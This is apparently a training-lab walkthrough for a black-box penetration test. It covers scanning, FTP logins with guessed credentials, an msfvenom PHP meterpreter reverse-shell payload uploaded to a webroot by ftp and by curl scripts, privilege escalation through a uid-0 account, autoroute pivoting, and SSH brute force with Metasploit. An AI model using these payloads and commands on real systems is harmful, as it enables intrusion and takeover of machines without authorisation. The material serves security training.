Black-box 3

 

  • You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.

  • Some machines are exploitable instantly, but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information that will help you proceed further into the environment.

  • If you are stuck on one of the machines, don't overthink and start pentesting another one.

  • When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.

This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.

The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!

Goals

  • Discover and exploit all machines on the network

  • Read all flag files (one per machine)

  • Obtain root privileges on both machines (meterpreter's autoroute functionality and ncrack's minimal.usr list will prove useful)

What you will learn

  • Network discovery

  • Pivoting to other networks

  • Basic privilege escalation

Recommended tools

  • Dirb

  • Metasploit framework (recommended version 5)

  • Nmap

  • FTP Utility

Solutions

Below, you can find solutions for the engagement. Remember though that you can follow your own strategy (which may be different from the one explained below).

Step 1: CONNECT TO THE VPN

Connect to the lab environment using the provided VPN file.

Make sure you received an IP address within the 10.13.37.0/24 range.

Don't worry about the fact that you got an IP within the 10.13.37.0/24 range. The 172.16.37.0/24 range is accessible through a static route.

Step 2: DISCOVER LIVE HOSTS ON THE NETWORK

Using nmap, run a ping sweep (-sn) for live hosts on the 172.16.37.0/24 network.

Extract the discovered addresses, drop your own IP address if it appears, sort them and write the rest to a file (ips.txt). This file will be fed to nmap to perform a full TCP port scan, which is far quicker against a handful of live hosts than against the whole /24.

Use nmap with the following options (note that -A already implies -sV, OS detection, traceroute and the default NSE scripts, so -sV is redundant here but harmless):

  • -sV for service / version identification

  • -n to disable reverse DNS lookups

  • -v for verbose output

  • -Pn to skip host discovery and treat every listed host as alive (the ping sweep already told us they are up)

  • -p- to scan all 65535 TCP ports

  • -T4 to speed things up (fine on a lab VPN; drop to -T3 on a flaky link)

  • -iL to read the target list from a file (ips.txt)

  • --open to report only open ports and hide closed / filtered ones

  • -A for OS detection, version detection, default scripts and traceroute

nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open

You will come across something similar to the below.

Nmap scan report for 172.16.37.220
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Nmap scan report for 172.16.37.234
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
40121/tcp open ftp ProFTPD 1.3.0a
40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
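The Step 2 workflow scripted end to end, as an added example that is not part of the original lab text: a ping sweep is turned into ips.txt, the full scan runs over it, and the normal (non-grepable) nmap report is condensed to one line per open port. The attacker address 10.13.37.4 is the one used later in this lab; the ping-sweep report is constructed, and the service-scan excerpt is copied from the report above, so both parsing functions can be exercised without a lab connection.

```shell
#!/bin/sh
# Added example for Step 2 (not from the original lab text).
# Assumptions: our VPN (tap0) address is 10.13.37.4; nmap is on PATH when the
# real commands at the bottom are run; the samples are constructed/copied.

# live_hosts SELF_IP: read `nmap -sn` output on stdin and print every reported
# address except SELF_IP, one per line, numerically sorted and de-duplicated.
live_hosts() {
    grep -E '^Nmap scan report for' \
      | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' \
      | grep -vxF "$1" \
      | sort -t. -k1,1n -k2,2n -k3,3n -k4,4n -u
}

# open_ports: read a normal nmap report on stdin and emit
# "host port proto service version" for each open port. NSE script lines
# (starting with '|') and the PORT/STATE header are ignored; a host line of
# the form "name (ip)" is reduced to the ip.
open_ports() {
    awk '
        /^Nmap scan report for/ { host = $NF; gsub(/[()]/, "", host); next }
        /^[0-9]+\/(tcp|udp) +open/ {
            split($1, p, "/")
            version = ""
            for (i = 4; i <= NF; i++) version = (i == 4) ? $i : version " " $i
            printf "%s %s %s %s%s\n", host, p[1], p[2], $3,
                   (version == "" ? "" : " " version)
        }
    '
}

# Constructed ping-sweep report. Our own address is included only to exercise
# the filter; it would not appear in a sweep of 172.16.37.0/24 from a
# 10.13.37.0/24 VPN address.
SWEEP_SAMPLE='Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 172.16.37.234
Host is up (0.16s latency).
Nmap scan report for 172.16.37.220
Host is up (0.16s latency).
Nmap scan report for 10.13.37.4
Host is up (0.00010s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.12 seconds'

# Service-scan excerpt copied from the lab report above.
SCAN_SAMPLE='Nmap scan report for 172.16.37.220
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)

Nmap scan report for 172.16.37.234
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
40121/tcp open ftp ProFTPD 1.3.0a
40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))'

sample_ips()   { printf '%s\n' "$SWEEP_SAMPLE" | live_hosts 10.13.37.4; }
sample_ports() { printf '%s\n' "$SCAN_SAMPLE"  | open_ports; }

# Against the lab (requires nmap and the VPN connection):
#   nmap -sn -n 172.16.37.0/24 | live_hosts 10.13.37.4 > ips.txt
#   nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oN full.txt
#   open_ports < full.txt
```

The -oN copy of the full scan is what open_ports consumes; keeping it on disk also means the service list can be re-read later without rescanning when you come back to a host you skipped.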

Step 3: INSPECT BOTH HTTP SERVICES

Running dirb against http://172.16.37.234:40180 discovers the http://172.16.37.234:40180/xyz/ directory. This directory contains the following.

In addition, if we inspect the source code of the http://172.16.37.220 page, we come across the below.

Together these two findings give us a username (ftpuser) and tell us that the 172.16.37.220 host has a second address, 172.16.50.222, on a 172.16.50.0/24 network we are not yet able to reach. To get into that network, we first need to compromise one of the machines we can reach.

Step 4: INSPECT THE FTP SERVICE ON THE 172.16.37.234 MACHINE

The FTP service on port 40121 identifies itself as ProFTPD 1.3.0a, a promising banner. Let's try logging in with the ftpuser username identified in Step 3 and the same string as the password (ftpuser).

ftp 172.16.37.234 40121

The credentials are valid, and we can now explore the FTP environment.

Basic commands (pwd, ls, cd html, put) show that the login lands in the parent directory of Apache's webroot and that files can be uploaded into the html directory, which is the webroot itself. Being able to write arbitrary files into the webroot of a PHP-enabled web server is a solid path to remote code execution. Before relying on it, upload a harmless text file into html and request it over HTTP on port 40180 to confirm that the FTP directory really is what Apache serves.

Now, we should focus on creating a suitable reverse shell.

Step 5: MAKE THE APPROPRIATE PREPARATIONS TO ESTABLISH A REVERSE SHELL

A suitable payload for an Apache server that runs PHP is a PHP-based one. Let's generate it with msfvenom, as follows.

msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php

  • lhost is your tap0 (VPN) IP address; 10.13.37.4 is used throughout this walkthrough, substitute your own

  • lport is the port the handler will listen on. Pick a port that is commonly allowed out through firewalls, such as 53, 80 or 443, rather than an exotic one like 31337 or Metasploit's default 4444, which egress filters and IDS signatures are most likely to catch.

  • -o specifies the output file

Note that the ftp client's put command resolves relative paths against the client's local working directory, so run the client from the directory containing meterpreter.php (for example, if the file is on the Desktop, change to the Desktop before connecting), or change the local directory inside the client with lcd.

Before triggering the payload, set up a Metasploit listener for it, as follows (port 53 is a privileged port, so msfconsole must run as root to bind it).

use exploit/multi/handler
set lhost 10.13.37.4
set payload php/meterpreter_reverse_tcp
set lport 53
run

Step 6: UPLOAD THE METERPRETER-BASED FILE AND OBTAIN A REMOTE ROOT SHELL

Let's go back to the FTP connection. If it has timed out, reconnect by exiting the FTP client and connecting again.

Upload the meterpreter-based file with the ftp client's "put" command (not to be confused with the HTTP PUT verb), as follows. The cd html beforehand ensures the file lands directly in the webroot.

ftp 172.16.37.234 40121
ftpuser
ftpuser
cd html
put meterpreter.php

When the upload completes, request http://172.16.37.234:40180/meterpreter.php in a browser (or with curl) and watch the handler report a newly opened meterpreter session. The request will keep loading and eventually time out in the browser; that is expected, since the PHP process is busy running our payload and all we care about is that the server executed it.
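The same upload and trigger done non-interactively with curl, as an added example that is not part of the original lab text. It also includes the check recommended in Step 4: a random token is uploaded as html/probe.txt and fetched back over HTTP, so the payload is only dropped once the FTP directory is proven to be the webroot. The host, ports and credentials are the lab's; the html/ mapping (FTP login directory is the parent of Apache's webroot) is assumed from the cd html step above.

```shell
#!/bin/sh
# Added example for Steps 4-6 (not from the original lab text).
# Assumptions: lab host/ports/credentials below; the FTP login lands one
# level above the webroot, so an upload to html/X is served as /X over HTTP.

HOST=172.16.37.234
FTP_PORT=40121
HTTP_PORT=40180
FTP_USER=ftpuser
FTP_PASS=ftpuser

# ftp_to_http_url HOST HTTP_PORT UPLOAD_PATH: URL at which a file uploaded to
# UPLOAD_PATH (relative to the FTP root) should be served; strips "html/".
ftp_to_http_url() {
    path=${3#html/}
    printf 'http://%s:%s/%s\n' "$1" "$2" "$path"
}

# probe_webroot: upload a random token as html/probe.txt and compare it with
# what the web server returns. Succeeds only if the token round-trips, i.e.
# the FTP "html" directory really is the directory Apache serves.
probe_webroot() {
    token=$(head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n')
    printf '%s' "$token" > probe.txt
    curl -sS -T probe.txt "ftp://$HOST:$FTP_PORT/html/probe.txt" \
         --user "$FTP_USER:$FTP_PASS" || return 1
    got=$(curl -s -m 10 "$(ftp_to_http_url "$HOST" "$HTTP_PORT" html/probe.txt)")
    [ "$got" = "$token" ]
}

# deploy_payload: generate the PHP meterpreter, upload it into the webroot and
# request it once. The HTTP request hangs while the payload runs, so a short
# timeout (-m 5) is used and its exit status is ignored.
deploy_payload() {
    msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php
    curl -sS -T meterpreter.php "ftp://$HOST:$FTP_PORT/html/meterpreter.php" \
         --user "$FTP_USER:$FTP_PASS" || return 1
    curl -s -m 5 "$(ftp_to_http_url "$HOST" "$HTTP_PORT" html/meterpreter.php)" >/dev/null || true
}

# Usage, with exploit/multi/handler already listening on 10.13.37.4:53:
#   probe_webroot && deploy_payload
```

Remove probe.txt and meterpreter.php from the webroot once the session is established; leaving a passwordless PHP shell in a client's webroot is a finding in its own right.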

Issuing "shell" at the meterpreter prompt gives a remote command shell; bash -i then provides a friendlier, interactive prompt.

shell

bash -i

Viewing /etc/passwd shows that ftpuser has uid 0: despite its name it is root in all but name, and any process it runs is a root process.

su is the logical next step, but su must be run from a terminal and the shell we got from meterpreter has no tty, so it fails with "must be run from a terminal". First spawn a pseudo-terminal with Python:

python -c 'import pty;pty.spawn("/bin/bash")'

Then switch to the uid-0 account, entering the same password used for FTP (ftpuser):

su ftpuser

Confirm with id: the uid shown is 0 (reported as root, the first uid-0 name in /etc/passwd).
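The check behind "ftpuser is uid 0", as an added example that is not part of the original lab text: a couple of awk one-liners that list root-equivalent accounts and accounts with a real login shell, which can be pasted into any compromised shell. The /etc/passwd excerpt is constructed for offline use; its ftpuser line mirrors what the lab host shows.

```shell
#!/bin/sh
# Added example for Step 6 (not from the original lab text).
# Assumption: the passwd sample below is constructed; on the target, feed the
# real /etc/passwd to the functions instead.

# uid0_accounts: names of all accounts whose uid (third field) is 0. Anything
# other than "root" here is a root-equivalent account, whether a backdoor or
# a misconfiguration, and is worth a password guess.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }'
}

# extra_root_accounts: uid-0 accounts other than root itself; empty = clean.
extra_root_accounts() {
    uid0_accounts | grep -vx root || true
}

# login_accounts: "name:shell" for accounts with an interactive shell, i.e.
# candidates for su/ssh with guessed passwords. An empty shell field means
# /bin/sh on most systems, so it is deliberately kept.
login_accounts() {
    awk -F: '$7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $7 }'
}

PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ftpuser:x:0:0::/home/ftpuser:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin'

sample_root_accounts()  { printf '%s\n' "$PASSWD_SAMPLE" | extra_root_accounts; }
sample_login_accounts() { printf '%s\n' "$PASSWD_SAMPLE" | login_accounts; }

# On the target, from the meterpreter "shell":
#   extra_root_accounts < /etc/passwd       # prints: ftpuser
#   login_accounts < /etc/passwd
#   python -c 'import pty;pty.spawn("/bin/bash")'   # su needs a tty
#   su ftpuser                               # password: ftpuser
#   id                                       # uid=0(root) ...
```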

The flag is in the /var/www directory.

Note that it is readable only with root-level privileges, which is why the escalation above was necessary.

Step 7: LEVERAGE THE COMPROMISED 172.16.37.234 MACHINE TO CREATE A ROUTE TO THE SECOND NETWORK AND COMPROMISE THE REMAINING 172.16.37.220 MACHINE

Issuing an "nmap" command inside the 172.16.37.234 shell reveals that nmap is installed there. Use it to scan the remaining machine through its second address, 172.16.50.222 (identified during the web application reconnaissance in Step 3), since that network is reachable from this host but not from ours.

The scan shows an SSH service running on 172.16.50.222. Background the shell channel with Ctrl+Z (answer y at the prompt) and, back at the meterpreter > prompt, use meterpreter's autoroute functionality to route traffic for that network through this session. You can do this as follows (Metasploit 5 still accepts the run autoroute script, although it reports it as deprecated in favour of the post/multi/manage/autoroute module, which does the same thing).

run autoroute -s 172.16.50.0/24

Step 8: BRUTEFORCE / GUESS SSH CREDENTIALS USING METASPLOIT'S SSH_LOGIN MODULE

Autoroute sends Metasploit's traffic for 172.16.50.0/24 through the meterpreter session on the first compromised machine, so modules run from msfconsole can now reach the remaining machine on its second network. Note that only Metasploit modules use this route: tools on your own box (nmap, ssh) still cannot reach it unless you also add a socks proxy or a port forward through the session.

Let's focus on the SSH service. Metasploit's ssh_login module can guess valid SSH credentials and opens a session when it finds them. We can do that as follows.

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run

After a short time a valid login is found and a new session is opened. Note that it is a command shell over SSH, not a meterpreter. With user_file and pass_file both set to minimal.usr the module tries every user/password combination in the list; if you only want to test username-as-password pairs, the USER_AS_PASS option does that in a fraction of the time.

Interact with the new session (the number depends on how many sessions you already have open; here it is 3) and request an interactive bash, as follows.

sessions -i 3

bash -i

Finally, root's home directory (/root) contains the flag, .flag.txt.

Note that it is a dotfile, so it only shows up in the directory listing when ls is run with the "-la" parameters.
